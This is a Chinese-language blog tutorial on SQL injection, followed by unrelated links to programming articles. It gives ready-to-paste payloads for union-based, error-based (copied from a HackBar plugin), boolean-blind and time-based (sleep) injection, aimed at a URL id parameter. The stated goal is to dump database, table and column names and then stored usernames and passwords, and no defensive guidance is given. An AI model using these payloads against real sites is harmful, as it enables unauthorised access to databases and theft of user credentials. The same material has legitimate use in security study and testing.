百度360必应搜狗淘宝本站头条
当前位置:网站首页 > IT技术 > 正文

浅谈SQL注入

wptr33 2025-02-15 01:25 25 浏览

在关于SQL注入,百度的解释是这样的:SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

言简意赅地说,把数据变成程序,查询变成执行;就是不按常理出牌,俗称乱拳打死老师傅。

几种主流的sql注入技术浅析

——注入方法向下兼容,执行力越来越高


1.若是能观察到显示位和返回数据,即可使用手工id注入的方法

1.寻找注入点,构造闭合 url?id=1 所猜闭合 and 1=2 --+

若猜错则web无执行该语句,显示正常页面;猜对,则web执行该语句,出现预期外的结果

2.查看当前表总共有多少列 url?id=1 order by 所猜测的数字 --+

2.寻找显示位 url?id=-1’ union all select 1,2,3 --+

3.定位该网页所选用数据库 database()当前数据库 version() 数据库版本号

4.通过数据库查找web所用表 url?id=-1’ union all select 1,table_name,3 from information_schema.tables where table_schema=’当前数据库’ --+

5.通过已知数据库和表名查找该表内所有列名 url?id=-1’ union all select 1,column_name,3 from information_schema.columns where table_schema=’当前数据库’ and table_name=’当前表名’ --+

6.最后一只数据库,表名,列名后,直接查询数据库中的用户名和密码

url?id=-1 union all select 1,用户名,密码 from 表名

2.若是web页面无显示位,也无可惜那时数据,仍然有sql报错通知显示,即可使用报错型sql注入

以下代码摘自Firefox插件Max HackBar

报错型sql注入上述sql注入的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示sql语句。下边是利用 `count(*), FLOOR(RAND(0)*2,group by `报错。

前几部步骤一致,寻找到注入点后在植入点直接复制该段代码即可


查看database版本

OR 1 GROUP BY CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1

查看database

AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

查看表

AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(table_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=数据库名字 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

查看列

AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(column_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=表名 AND table_schema=数据库名 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

查看数据

AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(列名) AS CHAR),0x7e)) FROM 表名 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

在以上注入语句中,可以使用group_concat()函数进行一次多个查找



3.若是无显示位也无报错值,只能在页面上看到页面是否正确,这里就要使用布尔盲注blind injection了


什么是布尔?什么是盲注?

字面上,盲注就是瞎jb注入,看不见回显,只有1,和0

布尔值就是1,和0的值

布尔型是利用页面至少会呈现正确提交和错误提交两种不同回馈,来构造sql语句逐个猜测数据库中内容。
例如:一个人不说话,如果你说对了他就点头,如果你说错了他就摇头。理解以下场景:

菜鸟:“大佬,你是不姓张?”

不说话的大佬:摇头ing

菜鸟:“我知道了,大佬你姓赵是不是?”

不说话的大佬:欣慰的点头ing

菜鸟自语:“原来大佬姓赵啊”

然后菜鸟开始了新一轮的猜测问答

以上就是布尔型盲注的原理。

布尔盲注使用以下基本sql函数:

Length()//返回字符串的长度

Length(abc)返回3,表示abc字符串长度为3

Substr()//截取字符串

Stbstr(abc,1,1) 返回a,从abc的第一位开始截,步长为1。

前几部过程一致,寻找注入点后即可开始注入

构造判断语句

id =1 and 1=2

id =1’ and 1=2 --+

id =1“ and 1=2 --+


+ 构造暴库语句

id=1‘ and length(database())>1 --+ //增1这个数字大小来判断库名长度

id 1’ and ascii(substr(database(),1,1)) > 1 --+ //增加1这个数据来判断数据库名的第一个字母ascii值大小,参考码表

id=1‘ and ascii(substr((select table_name from information_schema.tables where table_schema='库名' limit 0,1),1,1))>1 --+ //表名

id =1‘ and ascii(substr((select column_name from information_schema. columns where TABLE_name = 'your table' and table_schema = '库名' limit 0,1),1,1)) //列名

id=1‘ and ascii(substr((select ’列名‘ from '表名' limit 0,1),1,1)) //爆值

通过基本的逻辑运算和ASCII表,成功只问是与否就可获取我们所想要知道的信息



4.若是无显示为也无报错值,布尔盲注之后也无显示对与否,我们是不是就没有办法获取信息了呢?

密码学中有一种通信攻击方式叫做侧信道攻击

百度百科如下:

边信道攻击,又称侧信道攻击:针对加密电子设备在运行过程中的时间消耗、功率消耗或电磁辐射之类的侧信道信息泄露而对加密设备进行攻击的方法被称为边信道攻击。这类新型攻击的有效性远高于密码分析的数学方法,因此给密码设备带来了严重的威胁。

我们这里使用的是被划重点的“时间消耗”间接地判断出服务器上是否执行该命令;

时间消耗需要用到以下函数

同普通布尔盲注类似,不过加入了sleep()函数,通过服务器返回数据的时间来判断该命令是否被执行(网页是不是很明显的卡了一下)

实际环境中根据自身需求进行改写睡眠时间


+ 构造判断语句

id=1' and if(1=2,1, sleep(10)) --+

id=1" and if(1=2,1, sleep(10)) --+

id=1) and if(1=2,1, sleep(10)) --+


+ 构造暴库语句

id=1‘ and if((length(database()>1),sleep(4),0) --+ //增加1值来猜库名的长度

id 1’ and if((ascii(substr(database(),1,1)) > 1),sleep(4),0 )--+ //库名

id 1’ and if((ascii(substr((select column_name from information_schema. columns where TABLE_name = 'your table' and table_schema = 'your database'limit 0,1),1,1)) > 1),sleep(4),0 )--+ //表名

sleep()

括号中直接加入睡眠时间,你就可以睡这个服务器了,睡了服务器,服务器就到手了

相关推荐

oracle数据导入导出_oracle数据导入导出工具

关于oracle的数据导入导出,这个功能的使用场景,一般是换服务环境,把原先的oracle数据导入到另外一台oracle数据库,或者导出备份使用。只不过oracle的导入导出命令不好记忆,稍稍有点复杂...

继续学习Python中的while true/break语句

上次讲到if语句的用法,大家在微信公众号问了小编很多问题,那么小编在这几种解决一下,1.else和elif是子模块,不能单独使用2.一个if语句中可以包括很多个elif语句,但结尾只能有一个else解...

python continue和break的区别_python中break语句和continue语句的区别

python中循环语句经常会使用continue和break,那么这2者的区别是?continue是跳出本次循环,进行下一次循环;break是跳出整个循环;例如:...

简单学Python——关键字6——break和continue

Python退出循环,有break语句和continue语句两种实现方式。break语句和continue语句的区别:break语句作用是终止循环。continue语句作用是跳出本轮循环,继续下一次循...

2-1,0基础学Python之 break退出循环、 continue继续循环 多重循

用for循环或者while循环时,如果要在循环体内直接退出循环,可以使用break语句。比如计算1至100的整数和,我们用while来实现:sum=0x=1whileTrue...

Python 中 break 和 continue 傻傻分不清

大家好啊,我是大田。今天分享一下break和continue在代码中的执行效果是什么,进一步区分出二者的区别。一、continue例1:当小明3岁时不打印年龄,其余年龄正常循环打印。可以看...

python中的流程控制语句:continue、break 和 return使用方法

Python中,continue、break和return是控制流程的关键语句,用于在循环或函数中提前退出或跳过某些操作。它们的用途和区别如下:1.continue(跳过当前循环的剩余部分,进...

L017:continue和break - 教程文案

continue和break在Python中,continue和break是用于控制循环(如for和while)执行流程的关键字,它们的作用如下:1.continue:跳过当前迭代,...

作为前端开发者,你都经历过怎样的面试?

已经裸辞1个月了,最近开始投简历找工作,遇到各种各样的面试,今天分享一下。其实在职的时候也做过面试官,面试官时,感觉自己问的问题很难区分候选人的能力,最好的办法就是看看候选人的github上的代码仓库...

面试被问 const 是否不可变?这样回答才显功底

作为前端开发者,我在学习ES6特性时,总被const的"善变"搞得一头雾水——为什么用const声明的数组还能push元素?为什么基本类型赋值就会报错?直到翻遍MDN文档、对着内存图反...

2023金九银十必看前端面试题!2w字精品!

导文2023金九银十必看前端面试题!金九银十黄金期来了想要跳槽的小伙伴快来看啊CSS1.请解释CSS的盒模型是什么,并描述其组成部分。答案:CSS的盒模型是用于布局和定位元素的概念。它由内容区域...

前端面试总结_前端面试题整理

记得当时大二的时候,看到实验室的学长学姐忙于各种春招,有些收获了大厂offer,有些还在苦苦面试,其实那时候的心里还蛮忐忑的,不知道自己大三的时候会是什么样的一个水平,所以从19年的寒假放完,大二下学...

由浅入深,66条JavaScript面试知识点(七)

作者:JakeZhang转发链接:https://juejin.im/post/5ef8377f6fb9a07e693a6061目录由浅入深,66条JavaScript面试知识点(一)由浅入深,66...

2024前端面试真题之—VUE篇_前端面试题vue2020及答案

添加图片注释,不超过140字(可选)1.vue的生命周期有哪些及每个生命周期做了什么?beforeCreate是newVue()之后触发的第一个钩子,在当前阶段data、methods、com...

今年最常见的前端面试题,你会做几道?

在面试或招聘前端开发人员时,期望、现实和需求之间总是存在着巨大差距。面试其实是一个交流想法的地方,挑战人们的思考方式,并客观地分析给定的问题。可以通过面试了解人们如何做出决策,了解一个人对技术和解决问...